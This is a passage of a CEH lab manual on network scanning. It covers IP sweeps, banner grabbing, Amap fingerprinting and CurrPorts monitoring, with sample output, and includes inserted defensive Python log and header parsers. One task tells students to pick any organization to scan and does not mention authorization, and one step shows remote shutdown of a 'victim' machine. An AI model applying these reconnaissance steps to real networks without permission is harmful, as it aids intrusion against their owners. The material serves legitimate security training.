
CEH Lab Manual

Scanning Networks - Module 03

Module 03 - Scanning Networks

Scanning a Target Network

Scanning a network refers to a set of procedures for identifying hosts, ports, and services running in a network.

Lab Scenario

ICON KEY: Valuable information; Test your knowledge; Web exercise; Workbook review

Vulnerability scanning determines the possibility of network security attacks. It evaluates the organization's systems and network for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment. You need to conduct penetration testing, list the threats and vulnerabilities found in an organization's network, and perform port scanning, network scanning, and vulnerability scanning to identify IP addresses/hostnames, live hosts, and vulnerabilities.
Lab Objectives

The objective of this lab is to help students in conducting network scanning, analyzing the network vulnerabilities, and maintaining a secure network. You need to perform a network scan to:
■ Check live systems and open ports
■ Perform banner grabbing and OS fingerprinting
■ Identify network vulnerabilities
■ Draw network diagrams of vulnerable hosts

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Environment

In the lab, you need:
■ A computer running with Windows Server 2012, Windows Server 2008, Windows 8 or Windows 7 with Internet access
■ A web browser
■ Administrative privileges to run tools and perform scans

Lab Duration

Time: 50 Minutes

Overview of Scanning Networks

Building on what we learned from our information gathering and threat modeling, we can now begin to actively query our victims for vulnerabilities that may lead to a compromise. We have narrowed down our attack surface considerably since we first began the penetration test with everything potentially in scope.

CEH Lab Manual Page 85

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.


Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. In fact, even a seemingly harmless misconfiguration can be the turning point in a penetration test that gives up the keys to the kingdom. For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol and we should generally steer our clients towards more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then the risk associated with the anonymous read option is minimal. On the other hand, if you are able to read the entire file system using the anonymous FTP account, or, possibly even worse, someone has mistakenly left the customer's trade secrets in the FTP directory that is readable to the anonymous user, this configuration is a critical issue. Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of them. As we will see in this module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment. In this module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools.
Lab Tasks

TASK 1: Overview

Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity. Recommended labs to assist you in scanning networks:
■ Scanning System and Network Resources Using Advanced IP Scanner
■ Banner Grabbing to Determine a Remote Target System Using ID Serve
■ Fingerprint Open Ports for Running Applications Using the Amap Tool
■ Monitor TCP/IP Connections Using the CurrPorts Tool
■ Scan a Network for Vulnerabilities Using GFI LanGuard 2012
■ Explore and Audit a Network Using Nmap
■ Scanning a Network Using the NetScan Tools Pro
■ Drawing Network Diagrams Using LANSurveyor Tool
■ Mapping a Network Using the Friendly Pinger
■ Scanning a Network Using the Nessus Tool
■ Auditing Scanning by Using Global Network Inventory
■ Anonymous Browsing Using Proxy Switcher

Ensure you have ready a copy of the additional readings handed out for this lab.


■ Daisy Chaining Using Proxy Workbench
■ HTTP Tunneling Using HTTPort
■ Basic Network Troubleshooting Using the MegaPing
■ Detect, Delete and Block Google Cookies Using G-Zapper
■ Scanning the Network Using the Colasoft Packet Builder
■ Scanning Devices in a Network Using The Dude
Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Scanning System and Network Resources Using Advanced IP Scanner

Advanced IP Scanner is a free network scanner that gives you various types of information regarding local network computers.

Lab Scenario

In this day and age, where attackers are able to wait for a single chance to attack an organization to disable it, it becomes very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities.

Lab Objectives

The objective of this lab is to help students perform a local network scan and discover all the resources on the network. You need to:
■ Perform a system and network scan
■ Enumerate user accounts
■ Execute remote penetration
■ Gather information about local network computers
Lab Environment

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

You can also download Advanced IP Scanner from http://www.advanced-ip-scanner.com.

In the lab, you need:
■ Advanced IP Scanner located at Z:\CEHv8 Module 03 Scanning Networks\Scanning Tools\Advanced IP Scanner
■ You can also download the latest version of Advanced IP Scanner from the link http://www.advanced-ip-scanner.com


Advanced IP Scanner works on Windows Server 2003/Server 2008 and on Windows 7 (32 bit, 64 bit).

■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows 8 as the attacker (host machine)
■ Another computer running Windows Server 2008 as the victim (virtual machine)
■ A web browser with Internet access
■ Double-click ipscan20.msi and follow the wizard-driven installation steps to install Advanced IP Scanner
■ Administrative privileges to run this tool

Lab Duration

Time: 20 Minutes
Overview of Network Scanning

Network scanning is performed to collect information about live systems, open ports, and network vulnerabilities. Gathered information is helpful in determining threats and vulnerabilities in a network and to know whether there are any suspicious or unauthorized IP connections, which may enable data theft and cause damage to resources.
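From the defender's side, a range scan like the one this lab runs shows up as one source address contacting many destinations within seconds, which is the "suspicious connection" pattern the overview mentions. The following Python script is an added example, not part of the CEH lab manual or of Advanced IP Scanner: it parses constructed per-packet log lines (the line format, the addresses and the thresholds are assumptions) and flags any source that reaches at least five distinct destinations inside a ten-second window.

```python
"""Flag sources that touch many distinct destinations in a short window (added example).

The log format below is hypothetical: "timestamp src dst proto detail", one packet per line.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines, not captured from any real device. 10.0.0.8 sweeps ten
# addresses in five seconds; 10.0.0.5 is ordinary traffic; one line is deliberately junk.
SAMPLE_LOG = """\
2012-08-28 12:20:01 10.0.0.8 10.0.0.1 icmp echo-request
2012-08-28 12:20:01 10.0.0.8 10.0.0.2 icmp echo-request
2012-08-28 12:20:02 10.0.0.8 10.0.0.3 icmp echo-request
2012-08-28 12:20:02 10.0.0.8 10.0.0.4 icmp echo-request
2012-08-28 12:20:03 10.0.0.8 10.0.0.5 icmp echo-request
2012-08-28 12:20:03 10.0.0.8 10.0.0.6 icmp echo-request
2012-08-28 12:20:04 10.0.0.8 10.0.0.7 icmp echo-request
2012-08-28 12:20:04 10.0.0.8 10.0.0.9 icmp echo-request
2012-08-28 12:20:05 10.0.0.8 10.0.0.10 icmp echo-request
2012-08-28 12:20:05 10.0.0.8 10.0.0.11 icmp echo-request
2012-08-28 12:20:03 10.0.0.5 10.0.0.1 tcp dport=445
2012-08-28 12:21:10 10.0.0.5 10.0.0.1 tcp dport=445
2012-08-28 12:22:45 10.0.0.5 10.0.0.7 tcp dport=80
this line is malformed and is skipped by the parser
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<src>(?:\d{1,3}\.){3}\d{1,3}) (?P<dst>(?:\d{1,3}\.){3}\d{1,3}) "
    r"(?P<proto>\w+)(?: (?P<detail>.*))?$"
)


def parse_line(line):
    """Return a record dict for a well-formed line, or None so callers can skip junk."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def detect_sweeps(lines, window_seconds=10, min_targets=5):
    """Map each source that reached >= min_targets distinct destinations inside some
    window_seconds-long window to the largest such count (sliding window per source)."""
    by_src = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_src[rec["src"]].append(rec)
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = 0, 0
        for end, rec in enumerate(recs):
            # Advance the window start until the oldest record is within the window.
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            best = max(best, len({r["dst"] for r in recs[start:end + 1]}))
        if best >= min_targets:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    for src, count in detect_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"possible host sweep from {src}: {count} distinct destinations")
```

The thresholds are deliberately conservative defaults; on a real network the window and target count should be tuned against a baseline of monitoring systems that legitimately poll many hosts.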
Lab Tasks

TASK 1: Launching Advanced IP Scanner

1. Go to Start by hovering the mouse cursor in the lower-left corner of the desktop (Windows 8).

FIGURE 1.1: Windows 8 - Desktop view

2. Click Advanced IP Scanner from the Start menu in the attacker machine (Windows 8).

With Advanced IP Scanner, you can scan hundreds of IP addresses simultaneously.

FIGURE 1.2: Windows 8 - Apps

3. The Advanced IP Scanner main window appears.

You can wake any machine remotely with Advanced IP Scanner, if the Wake-on-LAN feature is supported by your network card.

FIGURE 1.3: The Advanced IP Scanner main window

4. Now launch the Windows Server 2008 virtual machine (victim's machine).


You have to guess a range of IP addresses of the victim machine.

FIGURE 1.4: The victim machine Windows Server 2008

Radmin 2.x and 3.x integration enables you to connect (if Radmin is installed) to remote computers with just one click.

5. Now, switch back to the attacker machine (Windows 8) and enter an IP address range in the Select range field.
6. Click the Scan button to start the scan.

The status of the scan is shown at the bottom left side of the window.

7. Advanced IP Scanner scans all the IP addresses within the range and displays the scan results after completion.


Saving and loading lists of computers enables you to perform operations with a specific list of computers. Just save a list of the machines you need and Advanced IP Scanner loads it at startup automatically.

Group Operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.

FIGURE 1.6: The Advanced IP Scanner main window after scanning

8. You can see in the above figure that Advanced IP Scanner has detected the victim machine's IP address and displays the status as alive.
TASK 2: Extract Victim's IP Address Info

9. Right-click any of the detected IP addresses. It will list Wake-On-LAN, Shut down, and Abort Shut down.

Wake-on-LAN: You can wake any machine remotely with Advanced IP Scanner, if the Wake-on-LAN feature is supported by your network card.

FIGURE 1.7: The Advanced IP Scanner main window with Alive Host list

10. The list displays properties of the detected computer, such as IP address, Name, MAC, and NetBIOS information.
11. You can forcefully Shutdown, Reboot, and Abort Shutdown the selected victim machine/IP address.


Winfingerprint Input Options: IP Range (Netmask and Inverted Netmask supported), IP List, Single Host, Neighborhood.

FIGURE 1.8: The Advanced IP Scanner Computer properties window

12. Now you have the IP address, Name, and other details of the victim machine.
13. You can also try Angry IP Scanner located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner. It also scans the network for machines and ports.

Lab Analysis

Document all the IP addresses, open ports and their running applications, and protocols discovered during the lab.

Tool/Utility: Advanced IP Scanner
Information Collected/Objectives Achieved: Scan Information:
■ IP address
■ System name
■ MAC address
■ NetBIOS information
■ Manufacturer
■ System status


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine and evaluate the IP addresses and range of IP addresses.

Internet Connection Required: □ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs


Banner Grabbing to Determine a Remote Target System Using ID Serve

ID Serve is used to identify the make, model, and version of any website's server software.

Lab Scenario

In the previous lab, you learned to use Advanced IP Scanner. This tool can also be used by an attacker to detect vulnerabilities such as buffer overflow, integer flow, SQL injection, and web application vulnerabilities on a network. If these vulnerabilities are not fixed immediately, attackers can easily exploit them, break into the network, and cause server damage. Therefore, it is extremely important for penetration testers to be familiar with banner grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine the role of servers within a network. In this lab, you will learn the banner grabbing technique to determine a remote target system using ID Serve.
Lab Objectives

The objective of this lab is to help students learn banner grabbing on a website and discover the applications running on that website. In this lab you will learn to:
■ Identify the domain IP address
■ Identify the domain information

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Environment

To perform the lab you need:
■ ID Serve is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve


■ You can also download the latest version of ID Serve from the link http://www.grc.com/id/idserve.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Double-click idserve to run ID Serve
■ Administrative privileges to run the ID Serve tool
■ Run this tool on Windows Server 2012

Lab Duration

Time: 5 Minutes

Overview of ID Serve

ID Serve can connect to any server port on any domain or IP address, then pull and display the server's greeting message, if any, often identifying the server's make, model, and version, whether it's for FTP, SMTP, POP, NEWS, or anything else.
Lab Tasks

TASK 1: Identify website server information

1. Double-click idserve located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve
2. In the main window of ID Serve, shown in the following figure, select the Server Query tab.

FIGURE 2.1: Main window of ID Serve

If an IP address is entered instead of a URL, ID Serve will attempt to determine the domain name associated with the IP.

3. Enter the IP address or URL in the field Enter or copy/paste an Internet server URL or IP address here:


FIGURE 2.2: Entering the URL for query

ID Serve can accept the URL or IP as a command-line parameter.

4. Click Query The Server; it shows the server query processed information.

ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.

FIGURE 2.3: Server processed information (query log shown in the figure):
Initiating server query
Looking up IP address for domain www.certifiedhacker.com
The IP address for the domain is 202.75.54.101
Connecting to the server on standard HTTP port: 80
Connected! Requesting the server's default page
The server identified itself as: Microsoft-IIS/6.0

Lab Analysis

Document all the IP addresses, their running applications, and the protocols you discovered during the lab.


Tool/Utility: ID Serve
Information Collected/Objectives Achieved:
IP address: 202.75.54.101
Server Connection: Standard HTTP port: 80
Response headers returned from server:
■ HTTP/1.1 200
■ Server: Microsoft-IIS/6.0
■ X-Powered-By: PHP/4.4.8
■ Transfer-Encoding: chunked
■ Content-Type: text/html
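The response headers in the table above are exactly what a banner-grabbing tool reads back, so the same parsing is useful on the defending side to find out what a server announces about itself before anyone else does. The following Python script is an added example, not ID Serve's code or anything from the lab manual: it parses a constructed HTTP response modelled on the table (the status line's reason phrase and the body are assumptions), flags the headers that name the product or its version, and shows that the same check passes once those headers are removed.

```python
"""Parse an HTTP response head and flag banner headers that reveal the server stack (added example)."""
import re

# Constructed response modelled on the headers in the lab's ID Serve table; not a real capture.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"X-Powered-By: PHP/4.4.8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>...</html>"
)

# The same server after its banner headers were stripped (constructed for comparison).
HARDENED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

# Headers whose value commonly names the product or framework behind the site.
DISCLOSURE_HEADERS = {"server", "x-powered-by", "x-aspnet-version"}
# A dotted number such as 6.0 or 4.4.8 inside a header value.
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def parse_response_head(raw):
    """Split the status line and header list off a raw HTTP/1.x response.

    Header names are lowercased; order and duplicates are preserved as a list of pairs.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status_line = lines[0]
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # tolerate a malformed header line rather than abort the audit
        headers.append((name.strip().lower(), value.strip()))
    return status_line, headers


def audit_banner(headers):
    """Return (header, value, verdict) for every header that reveals the server stack."""
    findings = []
    for name, value in headers:
        if name in DISCLOSURE_HEADERS:
            verdict = "product and version disclosed" if VERSION_RE.search(value) else "product disclosed"
            findings.append((name, value, verdict))
    return findings


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        status, headers = parse_response_head(raw)
        print(label, status, audit_banner(headers) or "no banner disclosure")
```

A version string in Server or X-Powered-By lets anyone match the host against public vulnerability lists without touching the application itself, which is why removing or genericising those headers is a standard hardening step.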

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine what protocols ID Serve apprehends.
2. Check if ID Serve supports https (SSL) connections.

Internet Connection Required: □ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs


Fingerprinting Open Ports Using the Amap Tool

Amap determines the applications running on each open port.

Lab Scenario

Computers communicate with each other by knowing the IP address in use, and ports determine which program receives the data. A complete data transfer always contains the IP address plus the port number required. In the previous lab we found out that the server connection is using the standard HTTP port 80. If an attacker finds this information, he or she will be able to use the open ports for attacking the machine. In this lab, you will learn to use the Amap tool to perform port scanning and know exactly what applications are running on each port found open.
Lab Objectives

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

The objective of this lab is to help students learn to fingerprint open ports and discover applications running on these open ports. In this lab, you will learn to:
■ Identify the application protocols running on open port 80
■ Detect application protocols

Lab Environment

To perform the lab you need:
■ Amap is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP
■ You can also download the latest version of AMAP from the link http://www.thc.org/thc-amap
■ If you decide to download the latest version, then screenshots shown in the lab might differ


■ A computer running Web Services enabled for port 80
■ Administrative privileges to run the Amap tool
■ Run this tool on Windows Server 2012

Lab Duration

Time: 5 Minutes

Overview of Fingerprinting

Fingerprinting is used to discover the applications running on each open port found on the network. Fingerprinting is achieved by sending trigger packets and looking up the responses in a list of response strings.
Lab Tasks

TASK 1: Identify Application Protocols Running on Port 80

1. Open the command prompt and navigate to the Amap directory. In this lab the Amap directory is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP
2. Type amap www.certifiedhacker.com 80, and press Enter.

Administrator: Command Prompt
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>amap www.certifiedhacker.com 80
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:20:42 - MAPPING mode
Unidentified ports: 202.75.54.101:80/tcp (total 1).
amap v5.2 finished at 2012-08-28 12:20:53
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>

Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

FIGURE 3.1: Amap with hostname www.certifiedhacker.com with Port 80

3. You can see the specific application protocols running on the entered host name and the port 80.
4. Use the IP address to check the applications running on a particular port.
5. In the command prompt, type the IP address of your local Windows Server 2008 (virtual machine): amap 10.0.0.4 75-81 (local Windows Server 2008) and press Enter (the IP address will be different in your network). For Amap options, type amap -help.
6. Try scanning different websites using different port ranges, like amap www.certifiedhacker.com 1-200

D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>amap 10.0.0.4 75-81
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:27:51 - MAPPING mode
Protocol on 10.0.0.4:80/tcp matches http
Protocol on 10.0.0.4:80/tcp matches http-apache-2
Warning: Could not connect (unreachable) to 10.0.0.4:76/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:75/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:77/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:78/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:79/tcp, disabling port (EUNKN)
Protocol on 10.0.0.4:80/tcp matches http-iis
Protocol on 10.0.0.4:80/tcp matches webmin
Warning: Could not connect (unreachable) to 10.0.0.4:81/tcp, disabling port (EUNKN)
Unidentified ports: 10.0.0.4:75/tcp 10.0.0.4:76/tcp 10.0.0.4:77/tcp 10.0.0.4:78/tcp 10.0.0.4:79/tcp 10.0.0.4:81/tcp (total 6).
amap v5.2 finished at 2012-08-28 12:27:54
D:\CEH-Tools\CEHv8 Module 03 Scanning Network\Banner Grabbing Tools\AMAP>

Compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux and PalmOS.

FIGURE 3.2: Amap with IP address and with range of switches 73-81
Lab Analysis

Document all the IP addresses, open ports and their running applications, and the protocols you discovered during the lab.

Tool/Utility: Amap
Information Collected/Objectives Achieved:
Identified open port: 80
Web servers:
■ http-apache-2
■ http-iis
■ webmin
Unidentified ports:
■ 10.0.0.4:75/tcp
■ 10.0.0.4:76/tcp
■ 10.0.0.4:77/tcp
■ 10.0.0.4:78/tcp
■ 10.0.0.4:79/tcp
■ 10.0.0.4:81/tcp
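Amap prints one "Protocol on host:port/proto matches app" line per signature hit, and, as Figure 3.2 shows, several signatures (http, http-apache-2, http-iis, webmin) can fire on the same port, so the raw output needs structuring before it can be reconciled with what the server is supposed to run. The following Python script is an added example, not part of Amap or of the lab manual: it parses a constructed output sample shaped like Figure 3.2 (the sample text and the expected-service baseline are assumptions) into matches, unreachable ports and unidentified ports, then lists every match the baseline does not account for so it can be reviewed against the server inventory.

```python
"""Parse Amap MAPPING-mode output and reconcile it against an expected-service baseline (added example)."""
import re
from collections import defaultdict

# Constructed sample mirroring the shape of the lab's Figure 3.2 output; not captured from a real run.
SAMPLE_OUTPUT = """\
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:27:51 - MAPPING mode
Protocol on 10.0.0.4:80/tcp matches http
Protocol on 10.0.0.4:80/tcp matches http-apache-2
Warning: Could not connect (unreachable) to 10.0.0.4:76/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:75/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:77/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:78/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:79/tcp, disabling port (EUNKN)
Protocol on 10.0.0.4:80/tcp matches http-iis
Protocol on 10.0.0.4:80/tcp matches webmin
Warning: Could not connect (unreachable) to 10.0.0.4:81/tcp, disabling port (EUNKN)
Unidentified ports: 10.0.0.4:75/tcp 10.0.0.4:76/tcp 10.0.0.4:77/tcp 10.0.0.4:78/tcp 10.0.0.4:79/tcp 10.0.0.4:81/tcp (total 6).
amap v5.2 finished at 2012-08-28 12:27:54
"""

# Hypothetical inventory: which application signatures are expected on each (host, port).
EXPECTED = {("10.0.0.4", 80): {"http", "http-iis"}}

MATCH_RE = re.compile(r"^Protocol on (?P<host>[\d.]+):(?P<port>\d+)/(?P<proto>tcp|udp) matches (?P<app>\S+)")
UNREACH_RE = re.compile(r"^Warning: Could not connect \(unreachable\) to (?P<host>[\d.]+):(?P<port>\d+)/(?P<proto>tcp|udp)")
UNIDENT_RE = re.compile(r"^Unidentified ports: (?P<ports>.*?) ?\(total \d+\)\.")
ENDPOINT_RE = re.compile(r"([\d.]+):(\d+)/(tcp|udp)")


def parse_amap_output(text):
    """Group the three kinds of result lines: signature matches, unreachable ports, unidentified ports."""
    result = {"matches": defaultdict(list), "unreachable": [], "unidentified": []}
    for line in text.splitlines():
        m = MATCH_RE.match(line)
        if m:
            result["matches"][(m["host"], int(m["port"]))].append(m["app"])
            continue
        m = UNREACH_RE.match(line)
        if m:
            result["unreachable"].append((m["host"], int(m["port"])))
            continue
        m = UNIDENT_RE.match(line)
        if m:
            for host, port, _proto in ENDPOINT_RE.findall(m["ports"]):
                result["unidentified"].append((host, int(port)))
    result["matches"] = dict(result["matches"])
    return result


def unexpected_services(parsed, baseline):
    """Return (host, port, app) triples the baseline does not account for.

    A port missing from the baseline is itself unexpected, as is any extra app name on a known port.
    Overlapping signatures (several matches on one port) therefore surface here for a human to settle.
    """
    findings = []
    for (host, port), apps in sorted(parsed["matches"].items()):
        allowed = baseline.get((host, port), set())
        findings.extend((host, port, app) for app in apps if app not in allowed)
    return findings


if __name__ == "__main__":
    parsed = parse_amap_output(SAMPLE_OUTPUT)
    print("unidentified:", parsed["unidentified"])
    print("to review:", unexpected_services(parsed, EXPECTED))
```

Keeping "unreachable" separate from "unidentified" matters when the scan runs through a firewall: a port that could not be connected to says nothing about the service behind it, whereas an open but unidentified port is a real gap in the inventory.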


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Execute the Amap command for a host name with a port number other than 80.
2. Analyze how the Amap utility gets the applications running on different machines.
3. Use various Amap options and analyze the results.

Internet Connection Required: ☑ Yes □ No
Platform Supported: ☑ Classroom □ iLabs


Monitoring TCP/IP Connections Using the CurrPorts Tool

CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer.

Lab Scenario

In the previous lab you learned how to check for open ports using the Amap tool. As an ethical hacker and penetration tester, you must be able to block such attacks by using appropriate firewalls or disabling unnecessary services running on the computer. You already know that the Internet uses a software protocol named TCP/IP to format and transfer data. An attacker can monitor ongoing TCP connections and obtain all the information in the IP and TCP headers and the packet payloads, with which he or she can hijack the connection. As the attacker has all the information on the network, he or she can create false packets in the TCP connection. As a network administrator, your daily task is to check the TCP/IP connections of each server you manage. You have to monitor all TCP and UDP ports and list all the established IP addresses of the server using the CurrPorts tool.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Objectives

The objective of this lab is to help students determine and list all the TCP/IP and UDP ports of a local computer.

In this lab, you need to:
■ Scan the system for currently opened ports
■ Gather information on the TCP/IP and UDP ports that are opened
■ List all the IP addresses and processes that are currently established connections
■ Close unwanted TCP connections and kill the process that opened the ports

Lab Environment

To perform the lab, you need:
■ CurrPorts located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\CurrPorts
■ You can also download the latest version of CurrPorts from the link http://www.nirsoft.net/utils/cports.html
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click cports.exe to run this tool
■ Administrator privileges to run the CurrPorts tool

Note: You can download the CurrPorts tool from http://www.nirsoft.net.

Lab Duration

Time: 10 Minutes

Overview of Monitoring TCP/IP

Monitoring TCP/IP ports checks if there are multiple IP connections established. Scanning TCP/IP ports gets information on all the opened TCP and UDP ports and also displays all established IP addresses on the server.

Lab Tasks

The CurrPorts utility is a standalone executable and doesn't require any installation process or additional DLLs (Dynamic Link Libraries). Extract CurrPorts to the desired location and double-click cports.exe to launch.

TASK 1: Discover TCP/IP Connection

1. Launch CurrPorts. It automatically displays the process name, ports, IP and remote addresses, and their states.
[FIGURE 4.1: The CurrPorts main window with all processes, ports, and IP addresses]

2. CurrPorts lists all the processes and their IDs, protocols used, local and remote ports, local and remote IP addresses, and remote host names.

3. To view all the reports as an HTML page, click View > HTML Reports - All Items.
[FIGURE 4.2: CurrPorts with HTML Report - All Items]

Note: In the bottom left of the CurrPorts window, the status of total ports and remote connections displays.

4. The HTML Report automatically opens using the default browser.

[FIGURE 4.3: The web browser displaying CurrPorts Report - All Items]

Note: To check the countries of the remote IP addresses, you have to download the latest IP to Country file. You have to put the IpToCountry.csv file in the same folder as cports.exe.

5. To save the generated CurrPorts report from the web browser, click File > Save Page As... (Ctrl+S).

[FIGURE 4.4: The web browser to save CurrPorts Report - All Items]

Note: CurrPorts allows you to save all changes (added and removed connections) into a log file. In order to start writing to the log file, check the 'Log Changes' option under the File menu. By default, the log file is saved as cports.log in the same folder where cports.exe is located. You can change the default log filename by setting the LogFilename entry in the cports.cfg file.

6. To view only the selected report as an HTML page, select the reports and click View > HTML Reports - Selected Items.
Note: Be aware! The log file is updated only when you refresh the ports list manually, or when the AutoRefresh option is turned on.

[FIGURE 4.5: CurrPorts with HTML Report - Selected Items]

Note: You can also right-click on the web page and save the report.

7. The selected report automatically opens using the default browser.

Note: In the filters dialog box, you can add one or more filter strings (separated by spaces, semicolon, or CRLF). The syntax for a filter string is: [include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IPRange | Ports Range].

[FIGURE 4.6: The web browser displaying CurrPorts with HTML Report - Selected Items]

8. To save the generated CurrPorts report from the web browser, click File > Save Page As... (Ctrl+S).
[FIGURE 4.7: The web browser to save CurrPorts with HTML Report - Selected Items]

Note: Command-line option /stext <Filename> means save the list of all opened TCP/UDP ports into a regular text file.

9. To view the properties of a port, select the port and click File > Properties.

[FIGURE 4.8: CurrPorts to view properties for a selected port]

Note: Command-line option /stab <Filename> means save the list of all opened TCP/UDP ports into a tab-delimited text file.

10. The Properties window appears and displays all the properties for the selected port: Process Name, Process ID, Protocol, Local Port, Local Port Name, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name, State, Process Path, Product Name, File Description, File Version, Company, Process Created On, User Name, Process Services, Process Attributes, Added On, Module Filename, Remote IP Country, and Window Title.

11. Click OK to close the Properties window.

Note: Command-line option /shtml <Filename> means save the list of all opened TCP/UDP ports into an HTML file (Horizontal).

[FIGURE 4.9: The CurrPorts Properties window for the selected port]

TASK 2: Close TCP Connection

12. To close a TCP connection you think is suspicious, select the process and click File > Close Selected TCP Connections (or Ctrl+T).

[FIGURE 4.10: The CurrPorts Close Selected TCP Connections option window]

TASK 3: Kill Process

13. To kill the processes of a port, select the port and click File > Kill Processes Of Selected Ports.

[FIGURE 4.11: The CurrPorts Kill Processes Of Selected Ports option window]

14. To exit from the CurrPorts utility, click File > Exit. The CurrPorts window closes.

Note: Command-line option /sverhtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (Vertical).

[FIGURE 4.12: The CurrPorts Exit option window]
